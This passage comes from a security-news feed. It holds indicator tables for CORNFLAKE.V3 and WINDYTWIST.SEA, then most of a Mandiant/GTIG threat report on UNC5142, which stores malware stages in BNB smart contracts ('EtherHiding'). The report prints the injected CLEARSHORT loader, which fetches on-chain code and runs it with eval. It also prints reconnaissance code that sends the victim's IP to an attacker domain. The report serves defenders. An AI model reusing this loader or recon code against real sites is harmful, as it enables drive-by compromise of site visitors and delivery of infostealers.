<h4><span><span>Host-Based Artifacts</span></span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Artifact</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
<td>
<p><strong><span>SHA-256 Hash</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>C:\Users\&lt;User&gt;\AppData\Roaming\node-v22.11.0-win-x64\ckw8ua56.log</span></p>
</td>
<td>
<p><span>Copy of the CORNFLAKE.V3 (Node.js) sample used for persistence</span></p>
</td>
<td>
<p>000b24076cae8dbb00b46bb59188a0da5a940e325eaac7d86854006ec071ac5b</p>
</td>
</tr>
<tr>
<td>
<p><span>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater</span></p>
</td>
<td>
<p><span>Registry run key that executes the CORNFLAKE.V3 (Node.js) sample</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>C:\Users\&lt;User&gt;\AppData\Roaming\php\config.cfg</span></p>
</td>
<td>
<p><span>CORNFLAKE.V3 (PHP) sample</span></p>
</td>
<td>
<p>a2d4e8c3094c959e144f46b16b40ed29cc4636b88616615b69979f0a44f9a2d1</p>
</td>
</tr>
<tr>
<td>
<p><span>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\iCube</span></p>
</td>
<td>
<p><span>Registry run key that executes the CORNFLAKE.V3 (PHP) sample</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>C:\Users\&lt;User&gt;\AppData\Roaming\Shift194340\78G0ZrQi.png</span></p>
</td>
<td>
<p><span>WINDYTWIST.SEA backdoor sample dropped by CORNFLAKE.V3 (PHP)</span></p>
</td>
<td>
<p>14f9fbbf7e82888bdc9c314872bf0509835a464d1f03cd8e1a629d0c4d268b0c</p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4>Network-Based Artifacts</h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>IP Address</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><code>138.199.161[.]141</code></p>
</td>
<td>
<p><span>IP address associated with UNC5518 used to distribute CORNFLAKE.V3 (Node.js) malware</span></p>
</td>
</tr>
<tr>
<td>
<p><code>159.69.3[.]151</code></p>
</td>
<td>
<p><span>CORNFLAKE.V3 (Node.js) C2 server associated with UNC5774</span></p>
</td>
</tr>
<tr>
<td>
<p><code>varying-rentals-calgary-predict.trycloudflare[.]com</code></p>
</td>
<td>
<p><span>CORNFLAKE.V3 (PHP) C2 server associated with UNC5774</span></p>
</td>
</tr>
<tr>
<td>
<p><code>dnsmicrosoftds-data[.]com</code></p>
<p><code>windows-msg-as[.]live</code></p>
</td>
<td>
<p><span>Domains associated with UNC5518 used to distribute CORNFLAKE.V3 (PHP) malware</span></p>
</td>
</tr>
<tr>
<td>
<p><code>167.235.235[.]151</code></p>
<p><code>128.140.120[.]188</code></p>
<p><code>177.136.225[.]135</code></p>
</td>
<td>
<p><span>WINDYTWIST.SEA backdoor C2 server addresses associated with UNC5774</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Group on the Block: UNC5142 Leverages EtherHiding to Distribute Malware]]></title>
<description><![CDATA[Written by: Mark Magee, Jose Hernandez, Bavi Sadayappan, Jessa Valdez

Since late 2023, Mandiant Threat Defense and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that abuses the blockchain to facilitate the distribution of information stealers ...]]></description>
<link>https://tsecurity.de/de/3504166/it-security-nachrichten/new-group-on-the-block-unc5142-leverages-etherhiding-to-distribute-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504166/it-security-nachrichten/new-group-on-the-block-unc5142-leverages-etherhiding-to-distribute-malware/</guid>
<pubDate>Sun, 10 May 2026 08:09:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: <span>Mark Magee, Jose Hernandez, Bavi Sadayappan, Jessa Valdez</span></p>
<hr></div>
<div class="block-paragraph_advanced"><p><span>Since late 2023, </span><a href="https://cloud.google.com/security/products/managed-defense"><span>Mandiant Threat Defense</span></a><span> and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that abuses the blockchain to facilitate the distribution of information stealers (infostealers).</span><span> </span><span>UNC5142 is characterized by its use of compromised WordPress websites and "EtherHiding<span>"</span>, a technique used to obscure malicious code or data by placing it on a public blockchain, such as the </span><a href="https://www.bnbchain.org/en" rel="noopener" target="_blank"><span>BNB Smart Chain</span></a><span>. This post is part of a two-part blog series </span><span>on adversaries using the EtherHiding technique. Read our other post on <a href="https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding">North Korea (DPRK) adopting EtherHiding</a>.</span></p>
<p><span>Since late 2023, UNC5142 has significantly evolved their tactics, techniques, and procedures (TTPs) to enhance operational security and evade detection. Notably, we have not observed UNC5142 activity since late July 2025, suggesting a shift in the actor’s operational methods or a pause in their activity. </span></p>
<p><span>UNC5142 appears to indiscriminately target vulnerable WordPress sites, leading to widespread and opportunistic campaigns that impact a range of industry and geographic regions. As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with an UNC5142 compromised website. We have seen UNC5142 campaigns distribute infostealers including </span><span>ATOMIC</span><span>, </span><span>VIDAR</span><span>, </span><span>LUMMAC.V2</span><span>, and </span><span>RADTHIEF</span><span>. GTIG does not currently attribute these final payloads to UNC5142 as it is possible these payloads are distributed on behalf of other threat actors. This post will detail the full UNC5142 infection chain, analyze its novel use of smart contracts for operational infrastructure, and chart the evolution of its TTPs based on direct observations from Mandiant Threat Defense incidents.</span></p>
<h3><span>UNC5142 Attack Overview</span></h3>
<p><span>An UNC5142 infection chain typically involves the following key components or techniques:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>CLEARSHORT</strong><span>: A multistage JavaScript downloader to facilitate the distribution of payloads </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Compromised WordPress Websites:</strong><span> Websites running vulnerable versions of WordPress, or using vulnerable plugins/themes </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Smart Contracts:</strong><span> Self-executing contracts stored on the BNB Smart Chain (BSC) blockchain</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>EtherHiding</strong><span>: A technique used to obscure malicious code or data by placing it on a public blockchain. UNC5142 relies heavily on the BNB Smart Chain to store its malicious components in smart contracts, making them harder for traditional website security tools to detect and block</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig1a.max-1000x1000.png" alt="CLEARSHORT infection chain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ym1tq">Figure 1: CLEARSHORT infection chain</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>CLEARSHORT</span></h4>
<p><span>CLEARSHORT is a multistage JavaScript downloader used to facilitate malware distribution. The first stage consists of a JavaScript payload injected into vulnerable websites, designed to retrieve the second-stage payload from a malicious smart contract. The smart contract is responsible for fetching the next stage, a CLEARSHORT landing page, from an external attacker-controlled server. The CLEARSHORT landing page leverages ClickFix, a popular social engineering technique aimed at luring victims to locally run a malicious command using the Windows Run dialog box. </span></p>
<p><span>CLEARSHORT is an evolution of the CLEARFAKE downloader, which UNC5142 previously leveraged in their operations from late 2023 through mid-2024. CLEARFAKE is a malicious JavaScript framework that masquerades as a Google Chrome browser update notification. The primary function of the embedded JavaScript is to download a payload after the user clicks the "Update Chrome" button. The second-stage payload is a Base64-encoded JavaScript code stored </span><span>in a smart contract deployed on the BNB Smart Chain</span><span>.</span></p>
<h4><span>Compromised WordPress Sites</span></h4>
<p><span>The attack begins from the compromise of a vulnerable WordPress website which is exploited to gain unauthorized access. UNC5142 injects malicious JavaScript (CLEARSHORT stage 1) code into one of three locations:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Plugin directories:</strong><span> Modifying existing plugin files or adding new malicious files</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Theme files:</strong><span> Modifying theme files (like </span><code>header.php</code><span>, </span><code>footer.php</code><span>, or </span><code>index.php</code><span>) to include the malicious script</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Database:</strong><span> In some cases, the malicious code is injected directly into the WordPress database</span></p>
</li>
</ul>
<h5><span>What is a Smart Contract?</span></h5>
<p><span>Smart contracts are programs stored on a blockchain, like the BNB Smart Chain (BSC), that run automatically when a specified trigger occurs. While these triggers can be complex, CLEARSHORT uses a simpler method by calling a function that tells the contract to execute and return a pre-stored piece of data.</span></p>
<p><span>Smart contracts provide several advantages for threat actors to use in their operations, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Obfuscation:</strong><span> Storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Mutability (and Agility):</strong><span> While smart contracts themselves are immutable, the attackers use a clever technique. They deploy a first-level smart contract that contains a pointer to a second-level smart contract. The first-level contract acts as a stable entry point whose address never changes on the compromised website, directing the injected JavaScript to fetch code from a second-level contract, giving the attackers the ability to change this target without altering the compromised website.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Resilience</strong><span>: The use of blockchain technology for large parts of UNC5142’s infrastructure and operation increases their resiliency in the face of detection and takedown efforts. Network based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs. Seizure and takedown operations are also hindered given the immutability of the blockchain. This is further discussed later in the post.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Leveraging legitimate infrastructure:</strong><span> The BNB Smart Chain is a legitimate platform. Using it can help the malicious traffic blend in with normal activity as a means to evade detection.</span></p>
</li>
</ul>
<h5><span>Smart Contract Interaction</span></h5>
<p><span>CLEARSHORT stage 1 uses </span><code>Web3.js</code><span>, a collection of libraries that allow interaction with remote ethereum nodes using HTTP, IPC or WebSocket. Typically to connect to the BNB Smart Chain via a public node like </span><code>bsc-dataseed.binance[.]org</code><span>. The stage 1 code contains instructions to interact with specific smart contract addresses, and calls functions defined in the contract’s Application Binary Interface (ABI). These functions return payloads, including URLs to the CLEARSHORT landing page. </span><span>This page is decoded and executed within the browser, displaying a fake error message to the victim. The lure and template of this error message has varied over time, while maintaining the goal to lure the victim to run a malicious command via the Run dialog box. The executed command ultimately results in the download and execution of a follow-on payload, which is often an infostealer.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>// Load libraries from public CDNs to intereact with blockchain and decode payloads.
&lt;script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"&gt;&lt;/script&gt;
&lt;script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
    console.log('Start moving...');
    // The main malicious logic starts executing once the webpage's DOM is fully loaded.1st
    document.addEventListener('DOMContentLoaded', async () =&gt; {
        try {
            // Establishes a connection to the BNB Smart Chain via a public RPC node. 
            const web3 = new Web3('https://bsc-dataseed.binance.org/');
            // Creates an object to interact with the 1st-Level Smart Contract.
            const contract = new web3.eth.Contract([
                {
                    "inputs": [],
                    "stateMutability": "nonpayable",
                    "type": "constructor"
                },
                {
                    "inputs": [],
                    "name": "orchidABI", // Returns 2nd contract ABI
                    "outputs": [{
                        "internalType": "string",
                        "name": "",
                        "type": "string"
                    }],
                    "stateMutability": "view",
                    "type": "function"
                },
                {
                    "inputs": [],
                    "name": "orchidAddress",// Returns 2nd contract address
                    "outputs": [{
                        "internalType": "string",
                        "name": "",
                        "type": "string"
                    }],
                    "stateMutability": "view",
                    "type": "function"
                },
            
            ], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53'); // Hardcoded address of the 1st-Level Contract.
	//  ABI is Base64 decoded and then decompressed to get clean ABI.
            const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c =&gt; c.charCodeAt(0)), {
                to: 'string'
            }));
            // Calls the 'orchidAddress' function to get the address of the 2nd-Level Contract.
            const orchidAddress = await contract.methods.orchidAddress().call();
	     // New contract object created to represent 2nd-level contract.
            const orchid = new web3.eth.Contract(orchidABI, orchidAddress);
            const decompressedScript = pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c =&gt; c.charCodeAt(0)), {
                to: 'string'
            });
            eval(`(async () =&gt; { ${decompressedScript} })().then(() =&gt; { console.log('Moved.'); }).catch(console.error);`);
        } catch (error) {
            console.error('Road unavaible:', error);
        }
    });
&lt;/script&gt;</code></pre>
<p><span>Figure 2: Injected code from a compromised website - CLEARSHORT stage 1</span></p></div>
<div class="block-paragraph_advanced"><p><span>When a user visits a compromised web page, the injected JavaScript executes in the browser and initiates a set of connections to one or multiple BNB smart contracts, resulting in the retrieval and rendering of the CLEARSHORT landing page (stage 2) (Figure 3).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/unc5142-etherhiding-fig3.gif" alt="CLEARSHORT Landing Page showing Cloudflare “Unusual Web Traffic” error">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8f1xb">Figure 3: CLEARSHORT Landing Page showing Cloudflare “Unusual Web Traffic” error</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>EtherHiding</span></h4>
<p><span>A key element of UNC5142's operations is their use of the EtherHiding technique. Instead of embedding their entire attack chain within the compromised website, they store malicious components on the BNB Smart Chain, using smart contracts as a dynamic configuration and control backend.</span><span>The on-chain operation is managed by one or more actor-controlled wallets. These </span><a href="https://academy.binance.com/en/glossary/externally-owned-account-eoa" rel="noopener" target="_blank"><span>Externally Owned Accounts (EOAs)</span></a><span> are used to:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Deploy the smart contracts, establishing the foundation of the attack chain.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Supply the BNB needed to pay network fees for making changes to the attack infrastructure.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Update pointers and data within the contracts, such as changing the address of a subsequent contract or rotating the payload decryption keys.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/unc5142-etherhiding-fig4a.png" alt="UNC5142's EtherHiding architecture on the BNB Smart Chain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8f1xb">Figure 4: UNC5142's EtherHiding architecture on the BNB Smart Chain</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Evolution of UNC5142 TTPs</span></h3>
<p><span>Over the past year, Mandiant Threat Defense and GTIG have observed a consistent evolution in UNC5142's TTPs. Their campaigns have progressed from a single-contract system to the significantly more complex three-level smart contract architecture that enables their dynamic, multi-stage approach beginning in late 2024.</span></p>
<p><span>This evolution is characterized by several key shifts: the adoption of a three smart contract system for dynamic payload delivery, the abuse of legitimate services like Cloudflare Pages for hosting malicious lures, and a transition from simple Base64 encoding to AES encryption. The actor has continuously refined its social engineering lures and expanded its infrastructure, at times operating parallel sets of smart contracts to increase both the scale and resilience of their campaigns.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Timeframe</strong></p>
</th>
<th scope="col">
<p><strong>Key Changes</strong></p>
</th>
<th scope="col">
<p><strong>Hosting &amp; Infrastructure</strong></p>
</th>
<th scope="col">
<p><strong>Lure Encoding / Encryption</strong></p>
</th>
<th scope="col">
<p><strong>Notable Lures &amp; Payloads</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><strong>May 2024</strong></p>
</td>
<td>
<p><span>Single smart contract system</span></p>
</td>
<td>
<p><code>.shop</code><span> TLDs for lures and C2</span></p>
</td>
<td>
<p><span>Base64</span></p>
</td>
<td>
<p><span>Fake Chrome update lures</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>November 2024</strong></p>
</td>
<td>
<p><span>Introduction of the three-smart-contract system</span></p>
</td>
<td>
<p><span>Abuse of Cloudflare </span><code>*.pages.dev</code><span> for lures</span></p>
<p><span>.shop / .icu domains for recon</span></p>
</td>
<td>
<p><span>AES-GCM + Base64</span></p>
</td>
<td>
<p><span>STUN server for victim IP recon</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>January 2025</strong></p>
</td>
<td>
<p><span>Refinement of the three-contract system</span></p>
</td>
<td>
<p><span>Continued </span><code>*.pages.dev</code><span> abuse</span></p>
</td>
<td>
<p><span>AES-GCM + Base64</span></p>
</td>
<td>
<p><span>New lures: Fake reCAPTCHA, Data Privacy agreements</span></p>
<p><strong>ATOMIC</strong><span> (macOS), </span><strong>VIDAR</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>February 2025</strong></p>
</td>
<td>
<p><span>Secondary infrastructure deployed</span></p>
<p><span>Payload URL stored in smart contract</span></p>
</td>
<td>
<p><span>Expanded use of </span><code>*.pages.dev</code><span> and new payload domains</span></p>
</td>
<td>
<p><span>AES-GCM + Base64</span></p>
</td>
<td>
<p><span>New Lure: Cloudflare "Unusual Web Traffic" error</span></p>
<p><span>Recon check-in removed, replaced by cookie tracking</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>March 2025</strong></p>
</td>
<td>
<p><span>Active use of both Main and Secondary infrastructure</span></p>
</td>
<td>
<p><span>MediaFire and GitHub for payload hosting</span></p>
</td>
<td>
<p><span>AES-GCM + Base64</span></p>
</td>
<td>
<p><span>Staged POST check-ins to track victim interaction</span></p>
<p><strong>RADTHIEF</strong><span>, </span><strong>LUMMAC.V2</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>May 2025</strong></p>
</td>
<td>
<p><span>Continued refinement of lures and payload delivery</span></p>
</td>
<td>
<p><code>*.pages.dev</code><span> for lures, various TLDs for payloads</span></p>
</td>
<td>
<p><span>AES-GCM + Base64</span></p>
</td>
<td>
<p><span>New Lure: "Anti-Bot Verification" for Windows &amp; macOS</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Cloudflare Pages Abuse</span></h4>
<p><span>In late 2024, UNC5142 shifted to the use of the Cloudflare Pages service (</span><code>*.pages.dev</code><span>) to host their landing pages; previously they leveraged </span><code>.shop</code><span> TLD domains. Cloudflare Pages is a legitimate service maintained by Cloudflare that provides a quick mechanism for standing up a website online, leveraging Cloudflare’s network to ensure it loads swiftly. These pages provide several advantages: Cloudflare is a trusted company, so these pages are less likely to be immediately blocked, and it is easy for the attackers to quickly create new pages if old ones are taken down.</span></p>
<h4><span>The Three Smart Contract System</span></h4>
<p><span>The most significant change is the shift from a single smart contract system to a three smart contract system. This new architecture is an adaptation of a legitimate software design principle known as the </span><strong>proxy pattern</strong><span>, which developers use to make their contracts upgradable. A stable, unchangeable proxy forwards calls to a separate second-level contract that can be replaced to fix bugs or add features.</span></p>
<p><span>This setup functions as a highly efficient </span><strong>Router-Logic-Storage</strong><span> architecture where each contract has a specific job. This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites. As a result, the campaigns are much more agile and resistant to takedowns.</span></p>
<p role="presentation"><strong>1) Initial call to the First-Level contract:</strong><span> The infection begins when the injected JavaScript on a compromised website makes a </span><code>eth_call</code><span> to the </span><strong>First-Level Smart Contract</strong><span> (e.g., </span><a href="https://bscscan.com/address/0x9179dda8b285040bf381aabb8a1f4a1b8c37ed53" rel="noopener" target="_blank"><code>0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53</code></a><span>). The primary function of this contract is to act as a </span><strong>router</strong><span>. Its job is to provide the address and Application Binary Interface (ABI) for the next stage, ensuring attackers rarely need to update the script across their vast network of compromised websites. The ABI data is returned in a compressed and base64 encoded format which the script decodes via </span><code>atob()</code><span> and then decompresses using </span><code>pako.unzip</code><span> to get the clean interface data.</span></p>
<p role="presentation"><strong>2) Victim fingerprinting via the Second-Level contract:</strong><span> The injected JavaScript connects to the </span><strong>Second-Level Smart Contract</strong><span> (e.g., </span><a href="https://bscscan.com/address/0x8FBA1667BEF5EdA433928b220886A830488549BD" rel="noopener" target="_blank"><code>0x8FBA1667BEF5EdA433928b220886A830488549BD</code></a><span>). This contract acts as the </span><strong>logic</strong><span> of the attack, containing code to perform reconnaissance actions (Figure 5 and Figure 6). It makes a series of </span><code>eth_call</code><span> operations to execute specific functions within the contract to fingerprint the victim’s environment:</span></p>
<ul>
<li role="presentation"><code><span>teaCeremony (0x9f7a7126)</span></code><span>, initially served as a method for dynamic code execution and page display. Later it was used for adding and removing POST check-ins.</span></li>
<li><code><span>shibuyaCrossing (0x1ba79aa2)</span></code><span>, responsible for identifying the victim's platform or operating system with additional OS/platform values added over time</span></li>
<li><code><span>asakusaTemple (0xa76e7648)</span></code><span>, initially a placeholder for console log display that later evolved into a beacon for tracking user interaction stages by sending user-agent values</span></li>
<li><code><span>ginzaLuxury (0xa98b06d3)</span></code><span>, responsible for retrieving the code for finding, fetching, decrypting, and ultimately displaying the malicious lure to the user</span></li>
</ul>
<p><span>The functionality for command and control (C2) check-ins has evolved within the contract:</span></p>
<ul>
<li aria-level="2">
<p role="presentation"><strong>Late 2024:</strong><span> The script used a STUN server (</span><code>stun:stun.l.google.com:19302</code><span>) to obtain the victim's public IP and sent it to a domain like </span><code>saaadnesss[.]shop</code><span> </span><span>or</span><span> </span><code>lapkimeow[.]icu/check</code><span>.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>February 2025:</strong><span> The STUN-based POST check-in was removed and replaced with a cookie-based tracking mechanism (</span><code>data-ai-collecting</code><span>) within the </span><code>teaCeremony</code><span> (</span><code>0x9f7a7126</code><span>) function.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>April 2025:</strong><span> The check-in mechanism was reintroduced and enhanced. The </span><code>asakusaTemple</code><span> (</span><code>0xa76e7648</code><span>) function was modified to send staged POST requests to the domain </span><code>ratatui[.]today</code><span>, beaconing at each phase of the lure interaction to track victim progression.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig5.max-1000x1000.png" alt="Example of second-level smart contract transaction contents">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q9xn6">Figure 5: Example of second-level smart contract transaction contents</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>//Example of code retrieved from the second-level smart contract (IP check and STUN)
if (await new Promise(r =&gt; {
        let a = new RTCPeerConnection({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
        a.createDataChannel("");
        a.onicecandidate = e =&gt; {
            let ip = e?.candidate?.candidate?.match(/\d+\.\d+\.\d+\.\d+/)?.[0];
            if (ip) {
                fetch('https://saaadnesss[.]shop/check', { // Or lapkimeow[.]icu/check
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ ip, domain: location.hostname })
                }).then(r =&gt; r.json()).then(data =&gt; r(data.status));
                a.onicecandidate = null;
            }
        };
        a.createOffer().then(o =&gt; a.setLocalDescription(o));
    }) === "Decline") {
        console.warn("Execution stopped: Declined by server");
    } else {
        await teaCeremony(await orchid.methods.shibuyaCrossing().call(), 2);
        await teaCeremony(await orchid.methods.akihabaraLights().call(), 3);
        await teaCeremony(await orchid.methods.ginzaLuxury().call(), 4);
        await teaCeremony(await orchid.methods.asakusaTemple().call(), 5);
    }</code></pre>
<p><span>Figure 6: Decoded reconnaissance code stored in second-level smart contract transaction</span></p></div>
<div class="block-paragraph_advanced"><p><strong>3) Lure &amp; payload URL hosting in Third-Level Contract:</strong><span> Once the victim is fingerprinted, the logic in the Second-Level Contract queries the </span><strong>Third-Level Smart Contract</strong><span> (e.g., </span><a href="https://bscscan.com/address/0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA" rel="noopener" target="_blank"><code>0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA</code></a><span>). This final contract acts as a configuration</span><strong> storage</strong><span> container. It typically contains the URL hosting the encrypted CLEARSHORT payload, the AES key to decrypt the page, and the URL hosting the second stage payload.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/unc5142-etherhiding-fig7a.png" alt="Encrypted landing page URL">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="yxjen">Figure 7: Encrypted landing page URL</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig8a.max-1000x1000.png" alt="Payload URL">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="yxjen">Figure 8: Payload URL</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>By separating the static logic (second-level) from the dynamic configuration (third-level), UNC5142 can rapidly rotate domains, update lures, and change decryption keys with a single, cheap transaction to their third-level contract, ensuring their campaign remains effective against takedowns.</span></p>
<h4><span>How an Immutable Contract Can Be 'Updated'</span></h4>
<p><span>A key question that arises is how attackers can update something that is, by definition, unchangeable. The answer lies in the distinction between a smart contract's code and its data.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Immutable code:</strong><span> Once a smart contract is deployed, its program code is permanent and can never be altered. This is the part that provides trust and reliability.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Mutable data (state):</strong><span> However, a contract can also store data, much like a program uses a database. The permanent code of the contract can include functions specifically designed to change this stored data.</span></p>
</li>
</ul>
<p><span>UNC5142 exploits this by having their smart contracts built with special administrative functions. To change a payload URL, the actor uses their controlling wallet to send a transaction that calls one of these functions, feeding it the new URL. The contract's permanent code executes, receives this new information, and overwrites the old URL in its storage.</span></p>
<p><span>From that point on, any malicious script that queries the contract will automatically receive the new, updated address. The contract's program remains untouched, but its configuration is now completely different. This is how they achieve agility while operating on an immutable ledger.</span></p>
<p><span>An analysis of the transactions shows that a typical update, such as changing a lure URL or decryption key in the third-level contract, costs the actor between </span><strong>$0.25 and $1.50 USD</strong><span> in network fees. After the one-time cost of deploying the smart contracts, the initial funding for an operator wallet is sufficient to cover several hundred such updates. This low operational cost is a key enabler of their resilient, high-volume campaigns, allowing them to rapidly adapt to takedowns with minimal expense.</span></p>
<h4><span>AES-Encrypted CLEARSHORT</span></h4>
